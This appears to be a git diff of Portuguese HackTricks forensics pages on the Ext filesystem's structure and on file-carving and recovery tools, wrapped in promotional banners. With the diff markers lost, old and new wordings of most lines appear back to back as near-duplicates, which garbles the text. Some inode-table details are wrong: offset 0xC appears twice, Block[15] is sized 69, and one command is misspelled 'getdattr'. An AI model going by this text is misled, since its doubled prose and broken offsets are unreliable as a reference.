* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
# Ext - Sistema de Arquivos Estendido
**Ext2** é o sistema de arquivos mais comum para partições **sem journaling** (**partições que não mudam muito**), como a partição de boot. **Ext3/4** são **com journaling** e geralmente são usados para as **demais partições**.
**Ext2** é o sistema de arquivos mais comum para **partições sem journaling** (**partições que não mudam muito**) como a partição de inicialização. **Ext3/4** são **com journaling** e são usados geralmente para as **outras partições**.
Todos os grupos de blocos no sistema de arquivos têm o mesmo tamanho e são armazenados sequencialmente. Isso permite que o kernel derive facilmente a localização de um grupo de blocos em um disco a partir de seu índice inteiro.
Todos os grupos de blocos no sistema de arquivos têm o mesmo tamanho e são armazenados sequencialmente. Isso permite ao kernel derivar facilmente a localização de um grupo de blocos em um disco a partir de seu índice inteiro.
Cada grupo de blocos contém as seguintes informações:
* Uma cópia do superbloco do sistema de arquivos
* Uma cópia dos descritores do grupo de blocos
* Um bitmap de blocos de dados que é usado para identificar os blocos livres dentro do grupo
* Um bitmap de inodes, que é usado para identificar os inodes livres dentro do grupo
* tabela de inodes: consiste em uma série de blocos consecutivos, cada um contendo um número predefinido de inodes. Todos os inodes têm o mesmo tamanho: 128 bytes. Um bloco de 1.024 bytes contém 8 inodes, enquanto um bloco de 4.096 bytes contém 32 inodes. Note que no Ext2, não é necessário armazenar em disco um mapeamento entre um número de inode e o número de bloco correspondente, pois o último valor pode ser derivado do número do grupo de blocos e da posição relativa dentro da tabela de inodes. Por exemplo, suponha que cada grupo de blocos contenha 4.096 inodes e que queremos saber o endereço no disco do inode 13.021. Neste caso, o inode pertence ao terceiro grupo de blocos e seu endereço no disco está armazenado na 733ª entrada da tabela de inodes correspondente. Como você pode ver, o número do inode é apenas uma chave usada pelas rotinas do Ext2 para recuperar rapidamente o descritor de inode apropriado no disco
* Um mapa de bits de blocos de dados que é usado para identificar os blocos livres dentro do grupo
* Um mapa de bits de inodes, que é usado para identificar os inodes livres dentro do grupo
* tabela de inodes: consiste em uma série de blocos consecutivos, cada um dos quais contém um número predefinido de inodes do Ext2. Todos os inodes têm o mesmo tamanho: 128 bytes. Um bloco de 1.024 bytes contém 8 inodes, enquanto um bloco de 4.096 bytes contém 32 inodes. Note que no Ext2, não é necessário armazenar em disco um mapeamento entre um número de inode e o número de bloco correspondente, porque o último valor pode ser derivado do número do grupo de blocos e da posição relativa dentro da tabela de inodes. Por exemplo, suponha que cada grupo de blocos contenha 4.096 inodes e que desejamos saber o endereço no disco do inode 13.021. Neste caso, o inode pertence ao terceiro grupo de blocos e seu endereço no disco é armazenado na 733ª entrada da tabela de inodes correspondente. Como pode ver, o número do inode é apenas uma chave usada pelos rotinas do Ext2 para recuperar rapidamente o descritor de inode apropriado no disco
* blocos de dados, contendo arquivos. Qualquer bloco que não contenha informações significativas é considerado livre.
![](<../../../.gitbook/assets/image (406).png>)
## Recursos Opcionais do Ext
**Recursos afetam onde** os dados estão localizados, **como** os dados são armazenados nos inodes e alguns deles podem fornecer **metadados adicionais** para análise, portanto, os recursos são importantes no Ext.
**Recursos afetam onde** os dados estão localizados, **como** os dados são armazenados nos inodes e alguns deles podem fornecer **metadados adicionais** para análise, portanto os recursos são importantes no Ext.
Ext possui recursos opcionais que seu sistema operacional pode ou não suportar, existem 3 possibilidades:
O Ext possui recursos opcionais que seu sistema operacional pode ou não suportar, existem 3 possibilidades:
* Compatível
* Incompatível
* Compatível Apenas Leitura: Pode ser montado, mas não para escrita
* Compatível Somente Leitura: Pode ser montado, mas não para escrita
Se houver recursos **incompatíveis**, você não poderá montar o sistema de arquivos, pois o sistema operacional não saberá como acessar os dados.
@ -50,7 +50,7 @@ Um atacante suspeito pode ter extensões não padrão
## Superbloco
O superbloco é os primeiros 1024 bytes a partir do início e é repetido no primeiro bloco de cada grupo e contém:
O superbloco é os primeiros 1024 bytes do início e é repetido no primeiro bloco de cada grupo e contém:
* Tamanho do bloco
* Total de blocos
@ -59,8 +59,8 @@ O superbloco é os primeiros 1024 bytes a partir do início e é repetido no pri
* Total de inodes
* Inodes por grupo de blocos
* Nome do volume
* Última vez de escrita
* Última vez de montagem
* Última hora de gravação
* Última hora de montagem
* Caminho onde o sistema de arquivos foi montado pela última vez
* Status do sistema de arquivos (limpo?)
@ -70,89 +70,89 @@ fsstat -o <offsetstart> /pat/to/filesystem-file.ext
#You can get the <offsetstart> with the "p" command inside fdisk
```
Você também pode usar o aplicativo GUI gratuito: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\
Ou você também pode usar **python** para obter informações do superbloco: [https://pypi.org/project/superblock/](https://pypi.org/project/superblock/)
Ou você também pode usar **python** para obter as informações do superbloco: [https://pypi.org/project/superblock/](https://pypi.org/project/superblock/)
## inodes
Os **inodes** contêm a lista de **blocos** que **contêm** os **dados** reais de um **arquivo**.\
Se o arquivo for grande, um inode **pode conter ponteiros** para **outros inodes** que apontam para os blocos/mais inodes contendo os dados do arquivo.
Os **inodes** contêm a lista de **blocos** que **contêm** os dados reais de um **arquivo**.\
Se o arquivo for grande, um inode **pode conter ponteiros** para **outros inodes** que apontam para os blocos/mais inodes que contêm os dados do arquivo.
![](<../../../.gitbook/assets/image (416).png>)
Em **Ext2** e **Ext3**, os inodes têm tamanho de **128B**, **Ext4** atualmente usa **156B**, mas aloca **256B** em disco para permitir uma futura expansão.
Nos sistemas de arquivos **Ext2** e **Ext3**, os inodes têm tamanho de **128B**, o **Ext4** atualmente usa **156B** mas aloca **256B** no disco para permitir uma expansão futura.
Estrutura do inode:
| Offset | Size | Name | DescriptionF |
| ------ | ---- | ----------------- | ------------------------------------------------ |
| 0x0 | 2 | Modo do Arquivo | Modo e tipo do arquivo |
| 0x2 | 2 | UID | 16 bits inferiores do ID do proprietário |
| 0x4 | 4 | Tamanho Il | 32 bits inferiores do tamanho do arquivo |
| 0x8 | 4 | Atime | Tempo de acesso em segundos desde a época |
| 0xC | 4 | Ctime | Tempo de alteração em segundos desde a época |
| 0x10 | 4 | Mtime | Tempo de modificação em segundos desde a época |
| 0x14 | 4 | Dtime | Tempo de exclusão em segundos desde a época |
| 0x18 | 2 | GID | 16 bits inferiores do ID do grupo |
| 0x1A | 2 | Contagem de Hlink | Contagem de links físicos |
| 0xC | 4 | Blocos Io | 32 bits inferiores da contagem de blocos |
| 0x20 | 4 | Flags | Bandeiras |
| 0x24 | 4 | União osd1 | Linux: Versão I |
| 0x28 | 69 | Bloco\[15] | 15 pontos para bloco de dados |
| 0x64 | 4 | Versão | Versão do arquivo para NFS |
| 0x68 | 4 | ACL do arquivo baixo | 32 bits inferiores dos atributos estendidos (ACL, etc) |
| 0x6C | 4 | Tamanho do arquivo alto | 32 bits superiores do tamanho do arquivo (somente ext4) |
| 0x70 | 4 | Fragmento obsoleto | Endereço de fragmento obsoleto |
| 0x74 | 12 | Osd 2 | Segunda união dependente do sistema operacional |
| 0x74 | 2 | Blocos alto | 16 bits superiores da contagem de blocos |
| 0x76 | 2 | ACL do arquivo alto | 16 bits superiores dos atributos estendidos (ACL, etc.) |
| 0x78 | 2 | UID alto | 16 bits superiores do ID do proprietário |
| 0x7A | 2 | GID alto | 16 bits superiores do ID do grupo |
| 0x7C | 2 | Checksum Io | 16 bits inferiores do checksum do inode |
| Offset | Tamanho | Nome | Descrição |
| ------ | ------- | ----------------- | ----------------------------------------------- |
| 0x0 | 2 | Modo do Arquivo | Modo do arquivo e tipo |
| 0x2 | 2 | UID | 16 bits inferiores do ID do proprietário |
| 0x4 | 4 | Tamanho Il | 32 bits inferiores do tamanho do arquivo |
| 0x8 | 4 | Atime | Tempo de acesso em segundos desde a época |
| 0xC | 4 | Ctime | Tempo de alteração em segundos desde a época |
| 0x10 | 4 | Mtime | Tempo de modificação em segundos desde a época |
| 0x14 | 4 | Dtime | Tempo de exclusão em segundos desde a época |
| 0x18 | 2 | GID | 16 bits inferiores do ID do grupo |
| 0x1A | 2 | Contagem de Hlink | Contagem de links rígidos |
| 0xC | 4 | Blocos Io | 32 bits inferiores da contagem de blocos |
| 0x20 | 4 | Flags | Flags |
| 0x24 | 4 | União osd1 | Linux: Versão I |
| 0x28 | 69 | Bloco\[15] | 15 aponta para bloco de dados |
| 0x64 | 4 | Versão | Versão do arquivo para NFS |
| 0x68 | 4 | ACL de Arquivo baixo | 32 bits inferiores de atributos estendidos (ACL, etc) |
| 0x6C | 4 | Tamanho do Arquivo hi | 32 bits superiores do tamanho do arquivo (somente ext4) |
| 0x70 | 4 | Fragmento obsoleto | Um endereço de fragmento obsoleto |
| 0x74 | 12 | Osd 2 | Segunda união dependente do sistema operacional |
| 0x74 | 2 | Blocos hi | 16 bits superiores da contagem de blocos |
| 0x76 | 2 | ACL de Arquivo hi | 16 bits superiores de atributos estendidos (ACL, etc) |
| 0x78 | 2 | UID hi | 16 bits superiores do ID do proprietário |
| 0x7A | 2 | GID hi | 16 bits superiores do ID do grupo |
| 0x7C | 2 | Checksum Io | 16 bits inferiores do checksum do inode |
"Modify" é o carimbo de data/hora da última vez que o _conteúdo_ do arquivo foi modificado. Isso é frequentemente chamado de "_mtime_".\
"Change" é o carimbo de data/hora da última vez que o _inode_ do arquivo foi alterado, como ao mudar permissões, propriedade, nome do arquivo e o número de links físicos. É frequentemente chamado de "_ctime_".
"Modificar" é o horário da última vez que o _conteúdo_ do arquivo foi modificado. Isso é frequentemente chamado de "_mtime_".\
"Alterar" é o horário da última vez que o _inode_ do arquivo foi alterado, como ao alterar permissões, propriedade, nome do arquivo e o número de links rígidos. Frequentemente é chamado de "_ctime_".
Estrutura estendida do inode (Ext4):
Estrutura do inode estendida (Ext4):
| Offset | Size | Name | Description |
| ------ | ---- | ------------ | ------------------------------------------- |
| 0x80 | 2 | Tamanho extra | Quantos bytes além do padrão de 128 são usados |
| 0x82 | 2 | Checksum alto | 16 bits superiores do checksum do inode |
| 0x84 | 4 | Ctime extra | Bits extras do tempo de alteração |
| 0x88 | 4 | Mtime extra | Bits extras do tempo de modificação |
| 0x8C | 4 | Atime extra | Bits extras do tempo de acesso |
| 0x90 | 4 | Crtime | Tempo de criação do arquivo (segundos desde a época) |
| 0x94 | 4 | Crtime extra | Bits extras do tempo de criação do arquivo |
| 0x98 | 4 | Versão alto | 32 bits superiores da versão |
| 0x9C | | Não usado | Espaço reservado para futuras expansões |
| Offset | Tamanho | Nome | Descrição |
| ------ | ------- | ------------ | --------------------------------------------- |
| 0x80 | 2 | Tamanho Extra | Quantos bytes além dos 128 padrão são usados |
| 0x82 | 2 | Checksum hi | 16 bits superiores do checksum do inode |
| 0x84 | 4 | Ctime extra | Bits extras de tempo de alteração |
| 0x88 | 4 | Mtime extra | Bits extras de tempo de modificação |
| 0x8C | 4 | Atime extra | Bits extras de tempo de acesso |
| 0x90 | 4 | Crtime | Tempo de criação do arquivo (segundos desde a época) |
| 0x94 | 4 | Crtime extra | Bits extras de tempo de criação do arquivo |
| 0x98 | 4 | Versão hi | 32 bits superiores da versão |
| 0x9C | | Não utilizado | Espaço reservado para expansões futuras |
Inodes especiais:
| Inode | Propósito Especial |
| ----- | ---------------------------------------------------- |
| 0 | Não existe tal inode, a numeração começa em 1 |
| 1 | Lista de blocos defeituosos |
| ----- | ----------------------------------------------------- |
| 0 | Nenhum inode, a numeração começa em 1 |
| 1 | Lista de blocos defeituosos |
| 2 | Diretório raiz |
| 3 | Cotas de usuários |
| 4 | Cotas de grupos |
| 5 | Carregador de inicialização |
| 6 | Diretório de recuperação de arquivos excluídos |
| 3 | Quotas de usuário |
| 4 | Quotas de grupo |
| 5 | Carregador de inicialização |
| 6 | Diretório de recuperação |
| 7 | Descritores de grupo reservados (para redimensionar o sistema de arquivos) |
| 8 | Jornal |
| 9 | Inode de exclusão (para snapshots) |
| 8 | Diário |
| 9 | Inode de exclusão (para snapshots) |
| 10 | Inode de réplica |
| 11 | Primeiro inode não reservado (geralmente perdido + encontrado) |
| 11 | Primeiro inode não reservado (frequentemente lost + found) |
{% hint style="info" %}
Note que o tempo de criação só aparece no Ext4.
{% endhint %}
Conhecendo o número do inode, você pode facilmente encontrar seu índice:
Ao saber o número do inode, você pode facilmente encontrar seu índice:
* **Grupo de blocos** a que um inode pertence: (Número do inode - 1) / (Inodes por grupo)
* **Índice dentro do seu grupo**: (Número do inode - 1) mod(Inodes por grupo)
* **Grupo de blocos** ao qual um inode pertence: (Número do inode - 1) / (Inodes por grupo)
* **Índice dentro do grupo**: (Número do inode - 1) mod (Inodes/grupos)
* **Deslocamento** na **tabela de inodes**: Número do inode \* (Tamanho do inode)
* O "-1" é porque o inode 0 é indefinido (não usado)
* O "-1" é porque o inode 0 é indefinido (não utilizado)
```bash
ls -ali /bin | sort -n #Get all inode numbers and sort by them
stat /bin/ls #Get the inode information of a file
@ -164,12 +164,12 @@ Modo de Arquivo
| Número | Descrição |
| ------ | --------------------------------------------------------------------------------------------------- |
| **15** | **Reg/Slink-13/Socket-14** |
| **14** | **Diretório/Bloco Bit 13** |
| **13** | **Dispositivo Char/Bloco Bit 14** |
| **14** | **Diretório/Bit de Bloco 13** |
| **13** | **Dispositivo de Caractere/Bit de Bloco 14** |
| **12** | **FIFO** |
| 11 | Set UID |
| 10 | Set GID |
| 9 | Sticky Bit (sem ele, qualquer um com permissões de Escrita & exec em um diretório pode deletar e renomear arquivos) |
| 9 | Bit Sticky (sem ele, qualquer pessoa com permissões de escrita e execução em um diretório pode excluir e renomear arquivos) |
| 8 | Leitura do Proprietário |
| 7 | Escrita do Proprietário |
| 6 | Execução do Proprietário |
@ -180,19 +180,19 @@ Modo de Arquivo
| 1 | Escrita de Outros |
| 0 | Execução de Outros |
Os bits em negrito (12, 13, 14, 15) indicam o tipo de arquivo (um diretório, socket...) apenas uma das opções em negrito pode existir.
Os bits em negrito (12, 13, 14, 15) indicam o tipo de arquivo que o arquivo é (um diretório, soquete...) apenas uma das opções em negrito pode existir.
Diretórios
| Offset | Tamanho | Nome | Descrição |
| ------ | ------- | --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| 0x0 | 4 | Inode | |
| 0x4 | 2 | Rec len | Comprimento do registro |
| 0x6 | 1 | Name len | Comprimento do nome |
| 0x7 | 1 | File type | <p>0x00 Desconhecido<br>0x01 Regular</p><p>0x02 Diretório</p><p>0x03 Dispositivo Char</p><p>0x04 Dispositivo de Bloco</p><p>0x05 FIFO</p><p>0x06 Socket</p><p>0x07 Link Simbólico</p> |
| 0x8 | | Nome | String do nome (até 255 caracteres) |
| Deslocamento | Tamanho | Nome | Descrição |
| ------ | ---- | --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| 0x0 | 4 | Inode | |
| 0x4 | 2 | Comprimento do Registro | Comprimento do registro |
| 0x6 | 1 | Comprimento do Nome | Comprimento do nome |
| 0x7 | 1 | Tipo de Arquivo | <p>0x00 Desconhecido<br>0x01 Regular</p><p>0x02 Diretório</p><p>0x03 Dispositivo de Caractere</p><p>0x04 Dispositivo de Bloco</p><p>0x05 FIFO</p><p>0x06 Soquete</p><p>0x07 Link Simbólico</p> |
| 0x8 | | Nome | String do nome (até 255 caracteres) |
**Para aumentar o desempenho, blocos de diretório Root hash podem ser usados.**
**Para aumentar o desempenho, blocos de diretório de hash raiz podem ser usados.**
**Atributos Estendidos**
@ -201,42 +201,27 @@ Podem ser armazenados em
* Espaço extra entre inodes (256 - tamanho do inode, geralmente = 100)
* Um bloco de dados apontado por file\_acl no inode
Podem ser usados para armazenar qualquer coisa como um atributo do usuário se o nome começar com "user". Assim, dados podem ser ocultados dessa forma.
Podem ser usados para armazenar qualquer coisa como um atributo de usuário se o nome começar com "usuário". Dessa forma, os dados podem ser ocultados.
Entradas de Atributos Estendidos
| Offset | Tamanho | Nome | Descrição |
| ------ | ------- | ------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| 0x0 | 1 | Name len | Comprimento do nome do atributo |
| 0x1 | 1 | Name index | <p>0x0 = sem prefixo</p><p>0x1 = prefixo user.</p><p>0x2 = system.posix_acl_access</p><p>0x3 = system.posix_acl_default</p><p>0x4 = trusted.</p><p>0x6 = security.</p><p>0x7 = system.</p><p>0x8 = system.richacl</p> |
| 0x2 | 2 | Value offs | Offset a partir da primeira entrada do inode ou início do bloco |
| 0x4 | 4 | Value blocks | Bloco de disco onde o valor está armazenado ou zero para este bloco |
| 0x8 | 4 | Value size | Comprimento do valor |
| 0xC | 4 | Hash | Hash para atributos no bloco ou zero se no inode |
| 0x10 | | Nome | Nome do atributo sem NULL final |
| Deslocamento | Tamanho | Nome | Descrição |
| ------ | ---- | ------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| 0x0 | 1 | Comprimento do Nome | Comprimento do nome do atributo |
| 0x1 | 1 | Índice do Nome | <p>0x0 = sem prefixo</p><p>0x1 = prefixo user.</p><p>0x2 = system.posix_acl_access</p><p>0x3 = system.posix_acl_default</p><p>0x4 = trusted.</p><p>0x6 = security.</p><p>0x7 = system.</p><p>0x8 = system.richacl</p> |
| 0x2 | 2 | Deslocamento do Valor | Deslocamento a partir da primeira entrada de inode ou início do bloco |
| 0x4 | 4 | Blocos de Valor | Bloco de disco onde o valor é armazenado ou zero para este bloco |
| 0x8 | 4 | Tamanho do Valor | Comprimento do valor |
| 0xC | 4 | Hash | Hash para atributos no bloco ou zero se no inode |
| 0x10 | | Nome | Nome do atributo sem NULL final |
```bash
setfattr -n 'user.secret' -v 'This is a secret' file.txt #Save a secret using extended attributes
getfattr file.txt #Get extended attribute names of a file
getdattr -n 'user.secret' file.txt #Get extended attribute called "user.secret"
```
## Visão do Sistema de Arquivos
## Visualização do Sistema de Arquivos
Para ver o conteúdo do sistema de arquivos, você pode **usar a ferramenta gratuita**: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\
Ou você pode montá-lo no seu Linux usando o comando `mount`.
Ou você pode montá-lo em seu linux usando o comando `mount`.
[https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.](https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.)
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
[https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=O%20sistema%20de%20arquivos%20Ext2%20divide,menor%20tempo%20médio%20de%20busca%20no%20disco.](https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=O%20sistema%20de%20arquivos%20Ext2%20divide,menor%20tempo%20médio%20de%20busca%20no%20disco.)

70
forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
View file

@ -1,20 +1,20 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -26,12 +26,12 @@ Mais ferramentas em [https://github.com/Claudio-C/awesome-datarecovery](https://
## Autopsy
A ferramenta mais comum usada em forense para extrair arquivos de imagens é o [**Autopsy**](https://www.autopsy.com/download/). Baixe-o, instale-o e faça-o processar o arquivo para encontrar arquivos "ocultos". Note que o Autopsy é construído para suportar imagens de disco e outros tipos de imagens, mas não arquivos simples.
A ferramenta mais comum usada em forense para extrair arquivos de imagens é o [**Autopsy**](https://www.autopsy.com/download/). Baixe, instale e faça com que ele ingira o arquivo para encontrar arquivos "ocultos". Note que o Autopsy é construído para suportar imagens de disco e outros tipos de imagens, mas não arquivos simples.
## Binwalk <a href="#binwalk" id="binwalk"></a>
**Binwalk** é uma ferramenta para pesquisar arquivos binários como imagens e arquivos de áudio em busca de arquivos e dados embutidos.\
Pode ser instalado com `apt`, no entanto, o [código-fonte](https://github.com/ReFirmLabs/binwalk) pode ser encontrado no github.\
**Binwalk** é uma ferramenta para pesquisar arquivos binários como imagens e arquivos de áudio em busca de arquivos e dados incorporados.\
Pode ser instalado com `apt`, no entanto, a [fonte](https://github.com/ReFirmLabs/binwalk) pode ser encontrada no github.\
**Comandos úteis**:
```bash
sudo apt install binwalk #Insllation
@ -41,7 +41,7 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file
```
## Foremost
Outra ferramenta comum para encontrar arquivos ocultos é o **foremost**. Você pode encontrar o arquivo de configuração do foremost em `/etc/foremost.conf`. Se você deseja procurar apenas por alguns arquivos específicos, descomente-os. Se você não descomentar nada, o foremost procurará pelos tipos de arquivos configurados por padrão.
Outra ferramenta comum para encontrar arquivos ocultos é o **foremost**. Você pode encontrar o arquivo de configuração do foremost em `/etc/foremost.conf`. Se você deseja procurar por arquivos específicos, descomente-os. Se você não descomentar nada, o foremost procurará pelos tipos de arquivos configurados por padrão.
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
@ -49,51 +49,51 @@ foremost -v -i file.img -o output
```
## **Scalpel**
**Scalpel** é outra ferramenta que pode ser usada para encontrar e extrair **arquivos embutidos em um arquivo**. Neste caso, será necessário descomentar do arquivo de configuração (_/etc/scalpel/scalpel.conf_) os tipos de arquivo que deseja que ela extraia.
**Scalpel** é outra ferramenta que pode ser usada para encontrar e extrair **arquivos incorporados em um arquivo**. Neste caso, você precisará descomentar no arquivo de configuração (_/etc/scalpel/scalpel.conf_) os tipos de arquivos que deseja extrair.
```bash
sudo apt-get install scalpel
scalpel file.img -o output
```
## Bulk Extractor
Esta ferramenta está incluída no Kali, mas você pode encontrá-la aqui: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
Esta ferramenta está incluída no kali mas você pode encontrá-la aqui: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor)
Esta ferramenta pode escanear uma imagem e irá **extrair pcaps** dentro dela, **informações de rede (URLs, domínios, IPs, MACs, e-mails)** e mais **arquivos**. Você só precisa fazer:
```
bulk_extractor memory.img -o out_folder
```
Navegue por **todas as informações** que a ferramenta coletou (senhas?), **analise** os **pacotes** (leia[ **Análise de Pcaps**](../pcap-inspection/)), procure por **domínios estranhos** (domínios relacionados a **malware** ou **inexistentes**).
Navegue por **todas as informações** que a ferramenta coletou (senhas?), **analise** os **pacotes** (leia [**Análise de Pcaps**](../pcap-inspection/)), procure por **domínios estranhos** (domínios relacionados a **malware** ou **não existentes**).
## PhotoRec
Você pode encontrá-lo em [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download)
Vem com versões GUI e CLI. Você pode selecionar os **tipos de arquivo** que deseja que o PhotoRec procure.
Ele vem com versões GUI e CLI. Você pode selecionar os **tipos de arquivos** que deseja que o PhotoRec pesquise.
![](<../../../.gitbook/assets/image (524).png>)
## binvis
Confira o [código](https://code.google.com/archive/p/binvis/) e a [ferramenta de página web](https://binvis.io/#/).
Verifique o [código](https://code.google.com/archive/p/binvis/) e a [página da ferramenta web](https://binvis.io/#/).
### Características do BinVis
### Recursos do BinVis
* Visualizador de estrutura **ativo e visual**
* Visualizador de **estrutura** visual e ativo
* Múltiplos gráficos para diferentes pontos de foco
* Foco em porções de uma amostra
* **Visualização de strings e recursos**, em executáveis PE ou ELF, por exemplo.
* Obtenção de **padrões** para criptoanálise em arquivos
* **Detecção** de algoritmos de empacotamento ou codificação
* **Identificação** de Esteganografia por padrões
* **Diferenciação binária visual**
* Focando em porções de uma amostra
* **Visualizando strings e recursos**, em executáveis PE ou ELF, por exemplo
* Obtendo **padrões** para criptoanálise em arquivos
* **Identificando** algoritmos de empacotamento ou codificação
* **Identificando** Esteganografia por padrões
* **Diferenciando** binário visual
BinVis é um ótimo **ponto de partida para se familiarizar com um alvo desconhecido** em um cenário de caixa-preta.
BinVis é um ótimo **ponto de partida para se familiarizar com um alvo desconhecido** em um cenário de caixa preta.
# Ferramentas Específicas para Carving de Dados
# Ferramentas Específicas de Recuperação de Dados
## FindAES
Procura por chaves AES buscando seus agendamentos de chave. Capaz de encontrar chaves de 128, 192 e 256 bits, como as usadas por TrueCrypt e BitLocker.
Pesquisa por chaves AES procurando por suas agendas de chaves. Capaz de encontrar chaves de 128, 192 e 256 bits, como as usadas pelo TrueCrypt e BitLocker.
Baixe [aqui](https://sourceforge.net/projects/findaes/).
@ -105,20 +105,20 @@ Você pode usar a ferramenta de linha de comando do Linux **pdftotext** para tra
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
